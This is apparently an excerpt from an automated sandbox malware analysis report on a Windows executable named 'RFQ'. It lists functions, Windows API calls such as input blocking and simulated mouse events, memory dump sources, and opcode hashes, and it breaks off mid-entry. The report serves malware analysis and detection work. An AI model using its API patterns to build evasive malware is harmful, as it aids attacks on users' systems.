                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: 221ae0e7a5d6c756d774e6d1001673e7e42a373556c0050e876a0e60728d97eb
                                                                            • Instruction ID: acc74d192fc508d813f5e098939b0425d282b5332f6d747411fa997cb589da33
                                                                            • Opcode Fuzzy Hash: 221ae0e7a5d6c756d774e6d1001673e7e42a373556c0050e876a0e60728d97eb
                                                                            • Instruction Fuzzy Hash: 8CE0DF312002049FC340AF69C845EAABBEDBF94760F00C01AFA09D7360CAB1EC018BB1
                                                                            Function 006EE273 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 006EE29C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: 853914f08e5ed2675b4d6f3a056cfa65b18560c377f0e5cc53c030853b8b4f11
                                                                            • Instruction ID: bee1eebad29bc563d8c8c6854de39e13e299b7fd0db5064bc8099cd3ead171bf
                                                                            • Opcode Fuzzy Hash: 853914f08e5ed2675b4d6f3a056cfa65b18560c377f0e5cc53c030853b8b4f11
                                                                            • Instruction Fuzzy Hash: CAD05EB21923807CE89D0E7F9E2FFB63B0FE301701F54A24DB201C9795E5D7AA415425
                                                                            Function 006A0955 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020961,006A036E), ref: 006A095A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: c856b93e6df8943184a069e6d3e801c86ef2f5a0265661d2e4748609a599d13e
                                                                            • Instruction ID: bf8722f3a213dbf8926d7dbaf0005eb9e619150c9c9ff829750155d84c021ae7
                                                                            • Opcode Fuzzy Hash: c856b93e6df8943184a069e6d3e801c86ef2f5a0265661d2e4748609a599d13e
                                                                            • Instruction Fuzzy Hash:
                                                                            Function 006A77AB Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                            • Instruction ID: 4f5579091e79a8ea2e6a8fd79affed172d49e9d4738ca5d7fadd6c7ab35ae0b2
                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                            • Instruction Fuzzy Hash: 9351266160C6496ADB3976688D5D7FF27DB9F13340F18052AE88287382C609DE06CF6A
                                                                            Function 006B6D79 Relevance: .6, Instructions: 637COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67684b6e0c8c90dba268a8c563fc41482754e4face5bd1be2c0a641156ba21b3
                                                                            • Instruction ID: d17a50bd3692567c7714426cda766ac3eb0d4c6150a8c100fb7efbef83d7d0f8
                                                                            • Opcode Fuzzy Hash: 67684b6e0c8c90dba268a8c563fc41482754e4face5bd1be2c0a641156ba21b3
                                                                            • Instruction Fuzzy Hash: 7B323662D28F414DD7339634C822375628AAFB73C5F15D737E81AB5AAAEF29C5C35200
                                                                            Function 0069D3B5 Relevance: .6, Instructions: 635COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be056b325b0264fdd87a2788f76feaa4e3212705033ba4a1c6e4e0aa44a59380
                                                                            • Instruction ID: efa7b42467ee16277dea01c6d4a8b5e3851225689a436119bcc5853af794cba6
                                                                            • Opcode Fuzzy Hash: be056b325b0264fdd87a2788f76feaa4e3212705033ba4a1c6e4e0aa44a59380
                                                                            • Instruction Fuzzy Hash: 7232D131E001168BDF28AA2CC9946BDB7E3EF46314F68817BD855DBB91D334AD82CA51
                                                                            Function 006892A0 Relevance: .6, Instructions: 564COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd4f116c1ba7d56f983404300d1257fa9acab174ac46eb1b6459f876a07d6358
                                                                            • Instruction ID: 92c4cf7394bbd88df0c7aad299a63cfb74da1300de160bce45dc22890a3ce7ae
                                                                            • Opcode Fuzzy Hash: fd4f116c1ba7d56f983404300d1257fa9acab174ac46eb1b6459f876a07d6358
                                                                            • Instruction Fuzzy Hash: 1B22AD70A006099BDF14DFA4C981BFEB7F6FF48300F14822DE816A7291EB35A955CB65
                                                                            Function 0068AB30 Relevance: .5, Instructions: 475COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4fa6bb300258cacff7d6a1e60640c62f0b902ca02d1d05d7e95f57acf514dcb0
                                                                            • Instruction ID: 7a1da4f575f6d7b89b40a0884b67bb7d77f1237eda6541aed05d781d8674065d
                                                                            • Opcode Fuzzy Hash: 4fa6bb300258cacff7d6a1e60640c62f0b902ca02d1d05d7e95f57acf514dcb0
                                                                            • Instruction Fuzzy Hash: 3B02A2B1A00205EBDF05DF64D981BADB7B7FF44300F21816DE816DB290EB31AA65CB95
                                                                            Function 006A1C07 Relevance: .3, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction ID: 8729c9ce639ef5fbfb56bdc61fd4785779e7a6dbd15f8c3b0c697accc8f7c88d
                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                            • Instruction Fuzzy Hash: D39154722080A34ADB29663985740BEFFE35E533B1B1A079ED4F2CE2C5EE149D55DE20
                                                                            Function 006A1940 Relevance: .2, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction ID: 64f27ff628fb8a7509ee89e02e06573c44cc7aaa7842f15ef86660cb117b9a5f
                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                            • Instruction Fuzzy Hash: C79160722090A34EDB2D527A857407EFFE25A533A1B1A079ED4F2CE2C1FD149D65DE20
                                                                            Function 006A79DA Relevance: .2, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89b3444da66ad94dabd3dbd9821919b4b32929768a59f7f7fc59e4722ebb9e2a
                                                                            • Instruction ID: 3297e6af6ac2359a3622bbb91e6da2e7e4c0e4579bb7333a1168c5cebc30fa5f
                                                                            • Opcode Fuzzy Hash: 89b3444da66ad94dabd3dbd9821919b4b32929768a59f7f7fc59e4722ebb9e2a
                                                                            • Instruction Fuzzy Hash: 3E6148B16087097ADA34BD684C91BFE639BDF53300F14095DEA43DB381D9119E428F69
                                                                            Function 006A7C37 Relevance: .2, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a3dcbc489afb7b30803ed0d29186f1ac8c5591fd5d78bff319c2a7722b90116
                                                                            • Instruction ID: 94d714970330b7c3f8fed482cfb95e2f760d3a1196a94df4a5a322e5320abd65
                                                                            • Opcode Fuzzy Hash: 3a3dcbc489afb7b30803ed0d29186f1ac8c5591fd5d78bff319c2a7722b90116
                                                                            • Instruction Fuzzy Hash: DF6159716087095BDB74BA388CA6BFE2397EF93714F14081EE883DB381D615AD428F59
                                                                            Function 006A1696 Relevance: .2, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction ID: 3a5d11eb16c0cf3b7fb60d160508f74c3f348420dcbb8639d50233bd93986f5a
                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                            • Instruction Fuzzy Hash: F18186722080A34ADB69523984740BEFFE35A533A1B1A179ED4F2CF2C1EE14DE55DE20
                                                                            Function 01718718 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction ID: fe08c5134dfaac03092e8be84c043c60734f9c9c6c3e13900453fe23375bc91c
                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                            • Instruction Fuzzy Hash: 2541C171D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80
                                                                            Function 017185A8 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction ID: 6a56a6cdbf34037a6a1051798e82cd34762123eaf72a808ea553823b36ddec16
                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                            • Instruction Fuzzy Hash: CF019278A00109EFCB44DF98C5909AEF7B5FB48310F208599D819A7309D730AE41DB81
                                                                            Function 01718608 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction ID: 353d289e5429f3e1b7c424058c64dcad2f2a2cc6398d05bc49f95327947d2ceb
                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                            • Instruction Fuzzy Hash: 28019D78A00209EFCB44DF98C5909AEF7B5FB88310F208699E809A7306D730AE41DB81
                                                                            Function 01716F48 Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                            Function 00702A05 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00702A57
                                                                            • DeleteObject.GDI32(00000000), ref: 00702A6A
                                                                            • DestroyWindow.USER32 ref: 00702A79
                                                                            • GetDesktopWindow.USER32 ref: 00702A94
                                                                            • GetWindowRect.USER32(00000000), ref: 00702A9B
                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00702BCA
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00702BD8
                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C1F
                                                                            • GetClientRect.USER32(00000000,?), ref: 00702C2B
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00702C67
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C89
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702C9C
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CA7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00702CB0
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CBF
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00702CC8
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CCF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00702CDA
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702CEC
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0071FC54,00000000), ref: 00702D02
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00702D12
                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00702D38
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00702D57
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702D79
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00702F66
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: ea8057338881d26c6252720417115019d55d6d8e7054f932b2fd2e0476abe0ef
                                                                            • Instruction ID: 88c67b3c784613b208cdce8436da6a4761cbc622a45d61949a0f9539cd6028e8
                                                                            • Opcode Fuzzy Hash: ea8057338881d26c6252720417115019d55d6d8e7054f932b2fd2e0476abe0ef
                                                                            • Instruction Fuzzy Hash: 21026E71540214EFDB15DFA8CC8DEAE7BB9EB48710F108258F915AB2E1DB78AD01CB64
                                                                            Function 00716FA4 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00716FFE
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071702F
                                                                            • GetSysColor.USER32(0000000F), ref: 0071703B
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00717055
                                                                            • SelectObject.GDI32(?,?), ref: 00717064
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0071708F
                                                                            • GetSysColor.USER32(00000010), ref: 00717097
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0071709E
                                                                            • FrameRect.USER32(?,?,00000000), ref: 007170AD
                                                                            • DeleteObject.GDI32(00000000), ref: 007170B4
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 007170FF
                                                                            • FillRect.USER32(?,?,?), ref: 00717131
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00717153
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(00000012), ref: 007172F0
                                                                              • Part of subcall function 007172B7: SetTextColor.GDI32(?,?), ref: 007172F4
                                                                              • Part of subcall function 007172B7: GetSysColorBrush.USER32(0000000F), ref: 0071730A
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(0000000F), ref: 00717315
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(00000011), ref: 00717332
                                                                              • Part of subcall function 007172B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00717340
                                                                              • Part of subcall function 007172B7: SelectObject.GDI32(?,00000000), ref: 00717351
                                                                              • Part of subcall function 007172B7: SetBkColor.GDI32(?,00000000), ref: 0071735A
                                                                              • Part of subcall function 007172B7: SelectObject.GDI32(?,?), ref: 00717367
                                                                              • Part of subcall function 007172B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00717386
                                                                              • Part of subcall function 007172B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071739D
                                                                              • Part of subcall function 007172B7: GetWindowLongW.USER32(00000000,000000F0), ref: 007173AA
                                                                            Memory Dump Source
